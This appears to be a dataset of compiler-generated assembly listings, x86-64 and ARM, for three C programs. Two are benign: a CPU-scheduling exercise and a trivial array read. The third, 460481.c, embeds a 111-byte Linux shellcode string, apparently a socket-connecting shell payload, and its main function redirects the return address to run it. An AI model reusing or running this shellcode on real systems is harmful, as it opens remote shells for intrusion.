.file "460481.c" .intel_syntax noprefix .text .globl shellcode .data .align 32 .type shellcode, @object .size shellcode, 111 shellcode: .string "jfX\231j\001[RSj\002\211\341\315\200[^h\357\276\255\336\275\375\377\377\257\367\325UCj\020QP\260f\211\341\315\200_\260\bRjA\211\343PY\315\200\226\207\337\260\004\211\341\315\200\231BI\260\003\315\200\2019\n\r\n\ru\363\262\004\260\003\370\315\200\207\336r\367\205\300t\005\260\004\371\353\361\260\006\315\200\231\260\013\211\373RS\353\314" .text .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov DWORD PTR -20[rbp], edi mov QWORD PTR -32[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax lea rax, -16[rbp] add rax, 8 mov QWORD PTR -16[rbp], rax lea rdx, shellcode[rip] mov rax, QWORD PTR -16[rbp] mov DWORD PTR [rax], edx mov eax, 0 mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L3 call __stack_chk_fail@PLT .L3: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "460481.c" .text .global shellcode .data .align 2 .type shellcode, %object .size shellcode, 111 shellcode: .ascii "jfX\231j\001[RSj\002\211\341\315\200[^h\357\276\255" .ascii "\336\275\375\377\377\257\367\325UCj\020QP\260f\211\341" .ascii "\315\200_\260\010RjA\211\343PY\315\200\226\207\337\260" .ascii "\004\211\341\315\200\231BI\260\003\315\200\2019\012" .ascii "\015\012\015u\363\262\004\260\003\370\315\200\207\336" .ascii "r\367\205\300t\005\260\004\371\353\361\260\006\315\200" .ascii "\231\260\013\211\373RS\353\314\000" .section .rodata .align 2 .LC0: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] str r1, [fp, #-20] ldr r3, .L4 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 sub r3, fp, #12 add r3, r3, #8 str r3, [fp, #-12] ldr r3, [fp, #-12] ldr r2, .L4+4 str r2, [r3] mov r3, #0 ldr r2, .L4 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L3 bl __stack_chk_fail .L3: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L5: .align 2 .L4: .word .LC0 .word shellcode .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "778966.c" .intel_syntax noprefix .text .globl swap .type swap, @function swap: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -24[rbp], rdi mov QWORD PTR -32[rbp], rsi mov rax, QWORD PTR -24[rbp] mov eax, DWORD PTR [rax] mov DWORD PTR -4[rbp], eax mov rax, QWORD PTR -32[rbp] mov edx, DWORD PTR [rax] mov rax, QWORD PTR -24[rbp] mov DWORD PTR [rax], edx mov rax, QWORD PTR -32[rbp] mov edx, DWORD PTR -4[rbp] mov DWORD PTR [rax], edx nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size swap, .-swap .globl bub_sort .type bub_sort, @function bub_sort: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 40 mov QWORD PTR -24[rbp], rdi mov QWORD PTR -32[rbp], rsi mov DWORD PTR -36[rbp], edx mov DWORD PTR -8[rbp], 0 jmp .L3 .L7: mov DWORD PTR -4[rbp], 0 jmp .L4 .L6: mov eax, DWORD PTR -4[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -24[rbp] add rax, rdx mov edx, DWORD PTR [rax] mov eax, DWORD PTR -4[rbp] cdqe add rax, 1 lea rcx, 0[0+rax*4] mov rax, QWORD PTR -24[rbp] add rax, rcx mov eax, DWORD PTR [rax] cmp edx, eax jle .L5 mov eax, DWORD PTR -4[rbp] cdqe add rax, 1 lea rdx, 0[0+rax*4] mov rax, QWORD PTR -24[rbp] add rdx, rax mov eax, DWORD PTR -4[rbp] cdqe lea rcx, 0[0+rax*4] mov rax, QWORD PTR -24[rbp] add rax, rcx mov rsi, rdx mov rdi, rax call swap mov eax, DWORD PTR -4[rbp] cdqe add rax, 1 lea rdx, 0[0+rax*4] mov rax, QWORD PTR -32[rbp] add rdx, rax mov eax, DWORD PTR -4[rbp] cdqe lea rcx, 0[0+rax*4] mov rax, QWORD PTR -32[rbp] add rax, rcx mov rsi, rdx mov rdi, rax call swap .L5: add DWORD PTR -4[rbp], 1 .L4: mov eax, DWORD PTR -36[rbp] sub eax, 1 sub eax, DWORD PTR -8[rbp] cmp DWORD PTR -4[rbp], eax jl .L6 add DWORD PTR -8[rbp], 1 .L3: mov eax, DWORD PTR -8[rbp] cmp eax, DWORD PTR -36[rbp] jl .L7 nop nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size bub_sort, .-bub_sort .section .rodata .LC0: .string "enter the no. of process" .LC1: .string "%d" .LC2: .string "enter the arrival time" .LC3: .string "enter the burst time" .LC4: .string "Process\tAT\tBT\tCT\tTAT\tWT" .LC5: .string "%d\t%d\t%d\t%d\t%d\t%d\n" .text .globl main .type main, @function main: .LFB8: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 push r15 push r14 push r13 push r12 push rbx sub rsp, 248 .cfi_offset 15, -24 .cfi_offset 14, -32 .cfi_offset 13, -40 .cfi_offset 12, -48 .cfi_offset 3, -56 mov rax, QWORD PTR fs:40 mov QWORD PTR -56[rbp], rax xor eax, eax mov rax, rsp mov rbx, rax mov DWORD PTR -148[rbp], 0 lea rdi, .LC0[rip] call puts@PLT lea rax, -152[rbp] mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call __isoc99_scanf@PLT mov edx, DWORD PTR -152[rbp] movsx rax, edx sub rax, 1 mov QWORD PTR -136[rbp], rax movsx rax, edx mov r12, rax mov r13d, 0 movsx rax, edx mov r14, rax mov r15d, 0 movsx rax, edx lea rdx, 0[0+rax*4] mov eax, 16 sub rax, 1 add rax, rdx mov edi, 16 mov edx, 0 div rdi imul rdx, rax, 16 mov rax, rdx and rax, -4096 mov rcx, rsp sub rcx, rax .L9: cmp rsp, rcx je .L10 sub rsp, 4096 or QWORD PTR 4088[rsp], 0 jmp .L9 .L10: mov rax, rdx and eax, 4095 sub rsp, rax mov rax, rdx and eax, 4095 test rax, rax je .L11 mov rax, rdx and eax, 4095 sub rax, 8 add rax, rsp or QWORD PTR [rax], 0 .L11: mov rax, rsp add rax, 3 shr rax, 2 sal rax, 2 mov QWORD PTR -128[rbp], rax mov edx, DWORD PTR -152[rbp] movsx rax, edx sub rax, 1 mov QWORD PTR -120[rbp], rax movsx rax, edx mov QWORD PTR -176[rbp], rax mov QWORD PTR -168[rbp], 0 movsx rax, edx mov QWORD PTR -192[rbp], rax mov QWORD PTR -184[rbp], 0 movsx rax, edx lea rdx, 0[0+rax*4] mov eax, 16 sub rax, 1 add rax, rdx mov esi, 16 mov edx, 0 div rsi imul rdx, rax, 16 mov rax, rdx and rax, -4096 mov rcx, rsp sub rcx, rax .L12: cmp rsp, rcx je .L13 sub rsp, 4096 or QWORD PTR 4088[rsp], 0 jmp .L12 .L13: mov rax, rdx and eax, 4095 sub rsp, rax mov rax, rdx and eax, 4095 test rax, rax je .L14 mov rax, rdx and eax, 4095 sub rax, 8 add rax, rsp or QWORD PTR [rax], 0 .L14: mov rax, rsp add rax, 3 shr rax, 2 sal rax, 2 mov QWORD PTR -112[rbp], rax mov edx, DWORD PTR -152[rbp] movsx rax, edx sub rax, 1 mov QWORD PTR -104[rbp], rax movsx rax, edx mov QWORD PTR -208[rbp], rax mov QWORD PTR -200[rbp], 0 movsx rax, edx mov QWORD PTR -224[rbp], rax mov QWORD PTR -216[rbp], 0 movsx rax, edx lea rdx, 0[0+rax*4] mov eax, 16 sub rax, 1 add rax, rdx mov edi, 16 mov edx, 0 div rdi imul rax, rax, 16 mov rcx, rax and rcx, -4096 mov rdx, rsp sub rdx, rcx .L15: cmp rsp, rdx je .L16 sub rsp, 4096 or QWORD PTR 4088[rsp], 0 jmp .L15 .L16: mov rdx, rax and edx, 4095 sub rsp, rdx mov rdx, rax and edx, 4095 test rdx, rdx je .L17 and eax, 4095 sub rax, 8 add rax, rsp or QWORD PTR [rax], 0 .L17: mov rax, rsp add rax, 3 shr rax, 2 sal rax, 2 mov QWORD PTR -96[rbp], rax mov eax, DWORD PTR -152[rbp] movsx rdx, eax sub rdx, 1 mov QWORD PTR -88[rbp], rdx movsx rdx, eax mov QWORD PTR -240[rbp], rdx mov QWORD PTR -232[rbp], 0 movsx rdx, eax mov QWORD PTR -256[rbp], rdx mov QWORD PTR -248[rbp], 0 cdqe lea rdx, 0[0+rax*4] mov eax, 16 sub rax, 1 add rax, rdx mov esi, 16 mov edx, 0 div rsi imul rax, rax, 16 mov rcx, rax and rcx, -4096 mov rdx, rsp sub rdx, rcx .L18: cmp rsp, rdx je .L19 sub rsp, 4096 or QWORD PTR 4088[rsp], 0 jmp .L18 .L19: mov rdx, rax and edx, 4095 sub rsp, rdx mov rdx, rax and edx, 4095 test rdx, rdx je .L20 and eax, 4095 sub rax, 8 add rax, rsp or QWORD PTR [rax], 0 .L20: mov rax, rsp add rax, 3 shr rax, 2 sal rax, 2 mov QWORD PTR -80[rbp], rax mov eax, DWORD PTR -152[rbp] movsx rdx, eax sub rdx, 1 mov QWORD PTR -72[rbp], rdx movsx rdx, eax mov QWORD PTR -272[rbp], rdx mov QWORD PTR -264[rbp], 0 movsx rdx, eax mov QWORD PTR -288[rbp], rdx mov QWORD PTR -280[rbp], 0 cdqe lea rdx, 0[0+rax*4] mov eax, 16 sub rax, 1 add rax, rdx mov edi, 16 mov edx, 0 div rdi imul rax, rax, 16 mov rcx, rax and rcx, -4096 mov rdx, rsp sub rdx, rcx .L21: cmp rsp, rdx je .L22 sub rsp, 4096 or QWORD PTR 4088[rsp], 0 jmp .L21 .L22: mov rdx, rax and edx, 4095 sub rsp, rdx mov rdx, rax and edx, 4095 test rdx, rdx je .L23 and eax, 4095 sub rax, 8 add rax, rsp or QWORD PTR [rax], 0 .L23: mov rax, rsp add rax, 3 shr rax, 2 sal rax, 2 mov QWORD PTR -64[rbp], rax lea rdi, .LC2[rip] call puts@PLT mov DWORD PTR -140[rbp], 0 jmp .L24 .L26: mov eax, DWORD PTR -140[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -128[rbp] add rax, rdx mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call __isoc99_scanf@PLT mov rax, QWORD PTR -128[rbp] mov edx, DWORD PTR -140[rbp] movsx rdx, edx mov eax, DWORD PTR [rax+rdx*4] test eax, eax je .L25 mov DWORD PTR -148[rbp], 1 .L25: add DWORD PTR -140[rbp], 1 .L24: mov eax, DWORD PTR -152[rbp] cmp DWORD PTR -140[rbp], eax jl .L26 lea rdi, .LC3[rip] call puts@PLT mov DWORD PTR -144[rbp], 0 jmp .L27 .L28: mov eax, DWORD PTR -144[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -112[rbp] add rax, rdx mov rsi, rax lea rdi, .LC1[rip] mov eax, 0 call __isoc99_scanf@PLT add DWORD PTR -144[rbp], 1 .L27: mov eax, DWORD PTR -152[rbp] cmp DWORD PTR -144[rbp], eax jl .L28 cmp DWORD PTR -148[rbp], 1 jne .L29 mov edx, DWORD PTR -152[rbp] mov rcx, QWORD PTR -112[rbp] mov rax, QWORD PTR -128[rbp] mov rsi, rcx mov rdi, rax call bub_sort .L29: mov rax, QWORD PTR -112[rbp] mov edx, DWORD PTR [rax] mov rax, QWORD PTR -96[rbp] mov DWORD PTR [rax], edx mov DWORD PTR -140[rbp], 1 jmp .L30 .L31: mov eax, DWORD PTR -140[rbp] lea edx, -1[rax] mov rax, QWORD PTR -96[rbp] movsx rdx, edx mov ecx, DWORD PTR [rax+rdx*4] mov rax, QWORD PTR -112[rbp] mov edx, DWORD PTR -140[rbp] movsx rdx, edx mov eax, DWORD PTR [rax+rdx*4] add ecx, eax mov rax, QWORD PTR -96[rbp] mov edx, DWORD PTR -140[rbp] movsx rdx, edx mov DWORD PTR [rax+rdx*4], ecx add DWORD PTR -140[rbp], 1 .L30: mov eax, DWORD PTR -152[rbp] cmp DWORD PTR -140[rbp], eax jl .L31 mov DWORD PTR -140[rbp], 0 jmp .L32 .L33: mov rax, QWORD PTR -96[rbp] mov edx, DWORD PTR -140[rbp] movsx rdx, edx mov ecx, DWORD PTR [rax+rdx*4] mov rax, QWORD PTR -128[rbp] mov edx, DWORD PTR -140[rbp] movsx rdx, edx mov eax, DWORD PTR [rax+rdx*4] sub ecx, eax mov rax, QWORD PTR -64[rbp] mov edx, DWORD PTR -140[rbp] movsx rdx, edx mov DWORD PTR [rax+rdx*4], ecx mov rax, QWORD PTR -64[rbp] mov edx, DWORD PTR -140[rbp] movsx rdx, edx mov ecx, DWORD PTR [rax+rdx*4] mov rax, QWORD PTR -112[rbp] mov edx, DWORD PTR -140[rbp] movsx rdx, edx mov eax, DWORD PTR [rax+rdx*4] sub ecx, eax mov rax, QWORD PTR -80[rbp] mov edx, DWORD PTR -140[rbp] movsx rdx, edx mov DWORD PTR [rax+rdx*4], ecx add DWORD PTR -140[rbp], 1 .L32: mov eax, DWORD PTR -152[rbp] cmp DWORD PTR -140[rbp], eax jl .L33 lea rdi, .LC4[rip] call puts@PLT mov DWORD PTR -140[rbp], 0 jmp .L34 .L35: mov rax, QWORD PTR -80[rbp] mov edx, DWORD PTR -140[rbp] movsx rdx, edx mov ecx, DWORD PTR [rax+rdx*4] mov rax, QWORD PTR -64[rbp] mov edx, DWORD PTR -140[rbp] movsx rdx, edx mov r8d, DWORD PTR [rax+rdx*4] mov rax, QWORD PTR -96[rbp] mov edx, DWORD PTR -140[rbp] movsx rdx, edx mov edi, DWORD PTR [rax+rdx*4] mov rax, QWORD PTR -112[rbp] mov edx, DWORD PTR -140[rbp] movsx rdx, edx mov edx, DWORD PTR [rax+rdx*4] mov rax, QWORD PTR -128[rbp] mov esi, DWORD PTR -140[rbp] movsx rsi, esi mov eax, DWORD PTR [rax+rsi*4] mov esi, DWORD PTR -140[rbp] add esi, 1 sub rsp, 8 push rcx mov r9d, r8d mov r8d, edi mov ecx, edx mov edx, eax lea rdi, .LC5[rip] mov eax, 0 call printf@PLT add rsp, 16 add DWORD PTR -140[rbp], 1 .L34: mov eax, DWORD PTR -152[rbp] cmp DWORD PTR -140[rbp], eax jl .L35 mov eax, 0 mov rsp, rbx mov rbx, QWORD PTR -56[rbp] sub rbx, QWORD PTR fs:40 je .L37 call __stack_chk_fail@PLT .L37: lea rsp, -40[rbp] pop rbx pop r12 pop r13 pop r14 pop r15 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE8: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "778966.c" .text .align 2 .global swap .syntax unified .arm .fpu softvfp .type swap, %function swap: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #20 str r0, [fp, #-16] str r1, [fp, #-20] ldr r3, [fp, #-16] ldr r3, [r3] str r3, [fp, #-8] ldr r3, [fp, #-20] ldr r2, [r3] ldr r3, [fp, #-16] str r2, [r3] ldr r3, [fp, #-20] ldr r2, [fp, #-8] str r2, [r3] nop add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size swap, .-swap .align 2 .global bub_sort .syntax unified .arm .fpu softvfp .type bub_sort, %function bub_sort: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 str r0, [fp, #-16] str r1, [fp, #-20] str r2, [fp, #-24] mov r3, #0 str r3, [fp, #-12] b .L3 .L7: mov r3, #0 str r3, [fp, #-8] b .L4 .L6: ldr r3, [fp, #-8] lsl r3, r3, #2 ldr r2, [fp, #-16] add r3, r2, r3 ldr r2, [r3] ldr r3, [fp, #-8] add r3, r3, #1 lsl r3, r3, #2 ldr r1, [fp, #-16] add r3, r1, r3 ldr r3, [r3] cmp r2, r3 ble .L5 ldr r3, [fp, #-8] lsl r3, r3, #2 ldr r2, [fp, #-16] add r0, r2, r3 ldr r3, [fp, #-8] add r3, r3, #1 lsl r3, r3, #2 ldr r2, [fp, #-16] add r3, r2, r3 mov r1, r3 bl swap ldr r3, [fp, #-8] lsl r3, r3, #2 ldr r2, [fp, #-20] add r0, r2, r3 ldr r3, [fp, #-8] add r3, r3, #1 lsl r3, r3, #2 ldr r2, [fp, #-20] add r3, r2, r3 mov r1, r3 bl swap .L5: ldr r3, [fp, #-8] add r3, r3, #1 str r3, [fp, #-8] .L4: ldr r3, [fp, #-24] sub r2, r3, #1 ldr r3, [fp, #-12] sub r3, r2, r3 ldr r2, [fp, #-8] cmp r2, r3 blt .L6 ldr r3, [fp, #-12] add r3, r3, #1 str r3, [fp, #-12] .L3: ldr r2, [fp, #-12] ldr r3, [fp, #-24] cmp r2, r3 blt .L7 nop nop sub sp, fp, #4 @ sp needed pop {fp, pc} .size bub_sort, .-bub_sort .section .rodata .align 2 .LC0: .ascii "enter the no. of process\000" .align 2 .LC1: .ascii "%d\000" .align 2 .LC2: .ascii "enter the arrival time\000" .align 2 .LC3: .ascii "enter the burst time\000" .align 2 .LC4: .ascii "Process\011AT\011BT\011CT\011TAT\011WT\000" .align 2 .LC5: .ascii "%d\011%d\011%d\011%d\011%d\011%d\012\000" .align 2 .LC6: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 64 @ frame_needed = 1, uses_anonymous_args = 0 push {r4, r5, fp, lr} add fp, sp, #12 sub sp, sp, #80 ldr r3, .L23 ldr r3, [r3] str r3, [fp, #-16] mov r3,#0 mov r3, sp mov r5, r3 mov r3, #0 str r3, [fp, #-64] ldr r0, .L23+4 bl puts sub r3, fp, #72 mov r1, r3 ldr r0, .L23+8 bl __isoc99_scanf ldr ip, [fp, #-72] sub r3, ip, #1 str r3, [fp, #-68] mov r3, ip mov r0, r3 mov r1, #0 mov r2, #0 mov r3, #0 lsl r3, r1, #5 orr r3, r3, r0, lsr #27 lsl r2, r0, #5 mov r3, ip mov r0, r3 mov r1, #0 mov r2, #0 mov r3, #0 lsl r3, r1, #5 orr r3, r3, r0, lsr #27 lsl r2, r0, #5 mov r3, ip lsl r3, r3, #2 add r3, r3, #7 lsr r3, r3, #3 lsl r3, r3, #3 sub sp, sp, r3 add r3, sp, #16 add r3, r3, #3 lsr r3, r3, #2 lsl r3, r3, #2 str r3, [fp, #-52] ldr ip, [fp, #-72] sub r3, ip, #1 str r3, [fp, #-48] mov r3, ip mov r0, r3 mov r1, #0 mov r2, #0 mov r3, #0 lsl r3, r1, #5 orr r3, r3, r0, lsr #27 lsl r2, r0, #5 mov r3, ip mov r0, r3 mov r1, #0 mov r2, #0 mov r3, #0 lsl r3, r1, #5 orr r3, r3, r0, lsr #27 lsl r2, r0, #5 mov r3, ip lsl r3, r3, #2 add r3, r3, #7 lsr r3, r3, #3 lsl r3, r3, #3 sub sp, sp, r3 add r3, sp, #16 add r3, r3, #3 lsr r3, r3, #2 lsl r3, r3, #2 str r3, [fp, #-44] ldr ip, [fp, #-72] sub r3, ip, #1 str r3, [fp, #-40] mov r3, ip mov r0, r3 mov r1, #0 mov r2, #0 mov r3, #0 lsl r3, r1, #5 orr r3, r3, r0, lsr #27 lsl r2, r0, #5 mov r3, ip mov r0, r3 mov r1, #0 mov r2, #0 mov r3, #0 lsl r3, r1, #5 orr r3, r3, r0, lsr #27 lsl r2, r0, #5 mov r3, ip lsl r3, r3, #2 add r3, r3, #7 lsr r3, r3, #3 lsl r3, r3, #3 sub sp, sp, r3 add r3, sp, #16 add r3, r3, #3 lsr r3, r3, #2 lsl r3, r3, #2 str r3, [fp, #-36] ldr ip, [fp, #-72] sub r3, ip, #1 str r3, [fp, #-32] mov r3, ip mov r0, r3 mov r1, #0 mov r2, #0 mov r3, #0 lsl r3, r1, #5 orr r3, r3, r0, lsr #27 lsl r2, r0, #5 mov r3, ip mov r0, r3 mov r1, #0 mov r2, #0 mov r3, #0 lsl r3, r1, #5 orr r3, r3, r0, lsr #27 lsl r2, r0, #5 mov r3, ip lsl r3, r3, #2 add r3, r3, #7 lsr r3, r3, #3 lsl r3, r3, #3 sub sp, sp, r3 add r3, sp, #16 add r3, r3, #3 lsr r3, r3, #2 lsl r3, r3, #2 str r3, [fp, #-28] ldr ip, [fp, #-72] sub r3, ip, #1 str r3, [fp, #-24] mov r3, ip mov r0, r3 mov r1, #0 mov r2, #0 mov r3, #0 lsl r3, r1, #5 orr r3, r3, r0, lsr #27 lsl r2, r0, #5 mov r3, ip mov r0, r3 mov r1, #0 mov r2, #0 mov r3, #0 lsl r3, r1, #5 orr r3, r3, r0, lsr #27 lsl r2, r0, #5 mov r3, ip lsl r3, r3, #2 add r3, r3, #7 lsr r3, r3, #3 lsl r3, r3, #3 sub sp, sp, r3 add r3, sp, #16 add r3, r3, #3 lsr r3, r3, #2 lsl r3, r3, #2 str r3, [fp, #-20] ldr r0, .L23+12 bl puts mov r3, #0 str r3, [fp, #-56] b .L9 .L11: ldr r3, [fp, #-56] lsl r3, r3, #2 ldr r2, [fp, #-52] add r3, r2, r3 mov r1, r3 ldr r0, .L23+8 bl __isoc99_scanf ldr r3, [fp, #-52] ldr r2, [fp, #-56] ldr r3, [r3, r2, lsl #2] cmp r3, #0 beq .L10 mov r3, #1 str r3, [fp, #-64] .L10: ldr r3, [fp, #-56] add r3, r3, #1 str r3, [fp, #-56] .L9: ldr r3, [fp, #-72] ldr r2, [fp, #-56] cmp r2, r3 blt .L11 ldr r0, .L23+16 bl puts mov r3, #0 str r3, [fp, #-60] b .L12 .L13: ldr r3, [fp, #-60] lsl r3, r3, #2 ldr r2, [fp, #-44] add r3, r2, r3 mov r1, r3 ldr r0, .L23+8 bl __isoc99_scanf ldr r3, [fp, #-60] add r3, r3, #1 str r3, [fp, #-60] .L12: ldr r3, [fp, #-72] ldr r2, [fp, #-60] cmp r2, r3 blt .L13 ldr r3, [fp, #-64] cmp r3, #1 bne .L14 ldr r3, [fp, #-72] mov r2, r3 ldr r1, [fp, #-44] ldr r0, [fp, #-52] bl bub_sort .L14: ldr r3, [fp, #-44] ldr r2, [r3] ldr r3, [fp, #-36] str r2, [r3] mov r3, #1 str r3, [fp, #-56] b .L15 .L16: ldr r3, [fp, #-56] sub r2, r3, #1 ldr r3, [fp, #-36] ldr r2, [r3, r2, lsl #2] ldr r3, [fp, #-44] ldr r1, [fp, #-56] ldr r3, [r3, r1, lsl #2] add r1, r2, r3 ldr r3, [fp, #-36] ldr r2, [fp, #-56] str r1, [r3, r2, lsl #2] ldr r3, [fp, #-56] add r3, r3, #1 str r3, [fp, #-56] .L15: ldr r3, [fp, #-72] ldr r2, [fp, #-56] cmp r2, r3 blt .L16 mov r3, #0 str r3, [fp, #-56] b .L17 .L18: ldr r3, [fp, #-36] ldr r2, [fp, #-56] ldr r2, [r3, r2, lsl #2] ldr r3, [fp, #-52] ldr r1, [fp, #-56] ldr r3, [r3, r1, lsl #2] sub r1, r2, r3 ldr r3, [fp, #-20] ldr r2, [fp, #-56] str r1, [r3, r2, lsl #2] ldr r3, [fp, #-20] ldr r2, [fp, #-56] ldr r2, [r3, r2, lsl #2] ldr r3, [fp, #-44] ldr r1, [fp, #-56] ldr r3, [r3, r1, lsl #2] sub r1, r2, r3 ldr r3, [fp, #-28] ldr r2, [fp, #-56] str r1, [r3, r2, lsl #2] ldr r3, [fp, #-56] add r3, r3, #1 str r3, [fp, #-56] .L17: ldr r3, [fp, #-72] ldr r2, [fp, #-56] cmp r2, r3 blt .L18 ldr r0, .L23+20 bl puts mov r3, #0 str r3, [fp, #-56] b .L19 .L20: ldr r3, [fp, #-56] add ip, r3, #1 ldr r3, [fp, #-52] ldr r2, [fp, #-56] ldr lr, [r3, r2, lsl #2] ldr r3, [fp, #-44] ldr r2, [fp, #-56] ldr r4, [r3, r2, lsl #2] ldr r3, [fp, #-36] ldr r2, [fp, #-56] ldr r3, [r3, r2, lsl #2] ldr r2, [fp, #-20] ldr r1, [fp, #-56] ldr r2, [r2, r1, lsl #2] ldr r1, [fp, #-28] ldr r0, [fp, #-56] ldr r1, [r1, r0, lsl #2] str r1, [sp, #8] str r2, [sp, #4] str r3, [sp] mov r3, r4 mov r2, lr mov r1, ip ldr r0, .L23+24 bl printf ldr r3, [fp, #-56] add r3, r3, #1 str r3, [fp, #-56] .L19: ldr r3, [fp, #-72] ldr r2, [fp, #-56] cmp r2, r3 blt .L20 mov r3, #0 mov sp, r5 ldr r2, .L23 ldr r1, [r2] ldr r2, [fp, #-16] eors r1, r2, r1 mov r2, #0 beq .L22 bl __stack_chk_fail .L22: mov r0, r3 sub sp, fp, #12 @ sp needed pop {r4, r5, fp, pc} .L24: .align 2 .L23: .word .LC6 .word .LC0 .word .LC1 .word .LC2 .word .LC3 .word .LC4 .word .LC5 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "577630.c" .intel_syntax noprefix .text .globl foo .type foo, @function foo: .LFB0: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 64 mov DWORD PTR -52[rbp], edi mov QWORD PTR -64[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax lea rax, 16[rbp] mov QWORD PTR -16[rbp], rax mov eax, DWORD PTR -52[rbp] mov DWORD PTR -24[rbp], eax mov rax, QWORD PTR -64[rbp] mov QWORD PTR -32[rbp], rax mov eax, DWORD PTR -24[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -32[rbp] add rax, rdx mov eax, DWORD PTR [rax] mov DWORD PTR -36[rbp], eax nop mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L2 call __stack_chk_fail@PLT .L2: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE0: .size foo, .-foo .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "577630.c" .text .section .rodata .align 2 .LC0: .word __stack_chk_guard .text .align 2 .global foo .syntax unified .arm .fpu softvfp .type foo, %function foo: @ args = 0, pretend = 0, frame = 32 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #32 str r0, [fp, #-32] str r1, [fp, #-36] ldr r3, .L3 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 add r3, fp, #4 str r3, [fp, #-12] ldr r3, [fp, #-32] str r3, [fp, #-16] ldr r3, [fp, #-36] str r3, [fp, #-20] ldr r3, [fp, #-16] lsl r3, r3, #2 ldr r2, [fp, #-20] add r3, r2, r3 ldr r3, [r3] str r3, [fp, #-24] nop ldr r3, .L3 ldr r2, [r3] ldr r3, [fp, #-8] eors r2, r3, r2 mov r3, #0 beq .L2 bl __stack_chk_fail .L2: sub sp, fp, #4 @ sp needed pop {fp, pc} .L4: .align 2 .L3: .word .LC0 .size foo, .-foo .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
